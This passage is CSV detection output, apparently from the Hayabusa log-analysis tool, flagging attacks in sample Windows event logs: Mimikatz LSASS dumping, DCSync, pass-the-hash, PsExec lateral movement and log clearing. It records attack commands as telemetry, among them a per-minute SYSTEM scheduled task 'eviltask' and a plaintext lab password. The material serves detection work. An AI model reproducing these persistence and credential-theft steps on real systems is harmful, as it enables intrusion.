admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-26 16:36:00.829 +00:00,jump01.offsec.lan,4656,critical,CredAccess,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-26 16:36:00.829 +00:00,jump01.offsec.lan,4656,high,CredAccess,Generic Password Dumper Activity on 
LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-26 16:36:00.829 +00:00,jump01.offsec.lan,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-26 16:59:24.880 +00:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx +2021-03-26 16:59:24.892 +00:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx +2021-03-26 20:41:38.966 +00:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742-SPN set on computer account (DCshadow).evtx +2021-03-26 20:41:38.988 +00:00,rootdc1.offsec.lan,4662,high,CredAccess,Mimikatz DC Sync,,rules/sigma/builtin/security/win_dcsync.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1207-Rogue domain controller/ID4662-Sensitive attributes accessed (DCshadow).evtx +2021-03-26 20:41:39.009 +00:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account 
manipulation/ID4742-SPN set on computer account (DCshadow).evtx +2021-04-20 20:32:55.368 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x76073 | PID: 7280 | PGUID: 747F3D96-3A77-607F-0000-00105DD17600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:32:55.368 +00:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:00.296 +00:00,MSEDGEWIN10,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:00.305 +00:00,MSEDGEWIN10,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:00.306 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\samir | Process: System | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:00.384 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\user03 | Parent Cmd: 
""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile | LID: 0x770575 | PID: 2740 | PGUID: 747F3D96-3A7C-607F-0000-001058067700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:01.944 +00:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 127.0.0.1:49925 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2532 | PGUID: 747F3D96-04C3-607F-0000-0010F13B1E00,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:01.944 +00:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/net_connection_win_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:01.944 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49925 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:13.741 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? 
| LID: 0x3e7 | PID: 4912 | PGUID: 747F3D96-3A89-607F-0000-001028587700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:13.741 +00:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_sysmon/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:13.741 +00:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:14.273 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? 
| LID: 0x3e5 | PID: 5280 | PGUID: 747F3D96-3A8A-607F-0000-0010E4717700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:14.273 +00:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_sysmon/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:14.273 +00:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:14.860 +00:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.2.17:137 (MSEDGEWIN10) | Dst: 10.255.255.255:137 () | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:14.861 +00:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.255.255.255:137 () | Dst: 10.0.2.17:137 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:18.296 +00:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.3.15:137 (MSEDGEWIN10.home) | Dst: 10.0.3.255:137 () | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and 
Security.evtx +2021-04-20 20:33:18.296 +00:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.3.255:137 () | Dst: 10.0.3.15:137 (MSEDGEWIN10.home) | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:20.254 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49926 (MSEDGEWIN10) | Dst: 127.0.0.1:5357 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 09:27:51.181 +00:00,jump01.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx +2021-04-21 09:27:56.082 +00:00,jump01.offsec.lan,7045,high,,PSExec Lateral Movement,Service: PSEXESVC | Path: %SystemRoot%\PSEXESVC.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/alerts/System/7045_LateralMovement-PSEXEC.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx +2021-04-21 09:27:56.082 +00:00,jump01.offsec.lan,7045,info,Persis,Service Installed,Name: PSEXESVC | Path: %SystemRoot%\PSEXESVC.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx +2021-04-21 09:40:32.342 
+00:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.343 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.343 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: PSEXESVC.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.343 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: PSEXESVC.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.347 +00:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 
0x1375fd8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.348 +00:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1375ff5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.348 +00:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1376003,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.360 +00:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1376020,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.363 +00:00,srvdefender01.offsec.lan,4697,info,Persis,Service Installed,Name: PSEXESVC | Path: %SystemRoot%\PSEXESVC.exe | User: admmig | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x1376020,rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.364 
+00:00,srvdefender01.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: PSEXESVC | User: admmig | LID: 0x1376020 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.366 +00:00,srvdefender01.offsec.lan,4688,low,Exec,PsExec Service Start,,rules/sigma/process_creation_builtin/proc_creation_win_psexesvc_start.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.501 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.501 +00:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.510 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: cmd.exe | IP Addr: 10.23.42.22 | LID: 
0x1375fbd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.510 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: cmd.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.528 +00:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.528 +00:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.529 +00:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.531 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""cmd.exe"" -u demo\admmig -p Admin1235 -accepteula | Path: C:\Windows\cmd.exe | PID: 0x15d4 | User: SRVDEFENDER01$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.531 +00:00,srvdefender01.offsec.lan,4688,low,ResDev,Usage of Sysinternals Tools,,rules/sigma/process_creation_builtin/proc_creation_win_sysinternals_eula_accepted.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.567 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:38.463 +00:00,srvdefender01.offsec.lan,4688,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_builtin/proc_creation_win_local_system_owner_account_discovery.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:38.463 +00:00,srvdefender01.offsec.lan,4688,medium,Disc,Whoami Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_whoami.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:42.263 +00:00,srvdefender01.offsec.lan,4688,low,Disc,Suspicious Execution of Hostname,,rules/sigma/process_creation_builtin/proc_creation_win_susp_hostname.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote 
execution + admin share.evtx" +2021-04-21 09:41:03.008 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x590 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:41:03.008 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:41:03.023 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:42:03.014 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1050 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:42:03.014 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script 
Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:42:03.054 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:43:03.004 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xf90 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:43:03.004 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:43:03.022 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 13:30:00.569 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
""C:\Windows\system32\schtasks.exe"" /create /sc minute /mo 1 /tn eviltask /tr C:\tools\shell.cmd /ru SYSTEM | Path: C:\Windows\System32\schtasks.exe | PID: 0x15b4 | User: admmig | LID: 0x6fc89e",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-4698 Persistent scheduled task with SYSTEM privileges creation.evtx +2021-04-21 13:30:00.569 +00:00,srvdefender01.offsec.lan,4688,high,Exec | Evas,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation_builtin/proc_creation_win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-4698 Persistent scheduled task with SYSTEM privileges creation.evtx +2021-04-21 13:30:00.569 +00:00,srvdefender01.offsec.lan,4688,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation_builtin/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-4698 Persistent scheduled task with SYSTEM privileges creation.evtx +2021-04-21 13:30:00.589 +00:00,srvdefender01.offsec.lan,4698,info,,Task Created,"Name: \eviltask | Content: 2021-04-21T13:30:00 OFFSEC\admmig \eviltask PT1M false 2021-04-21T13:30:00 true IgnoreNew true true true false false PT10M PT1H true false true true false false false PT72H 7 C:\tools\shell.cmd S-1-5-18 LeastPrivilege | User: admmig | LID: 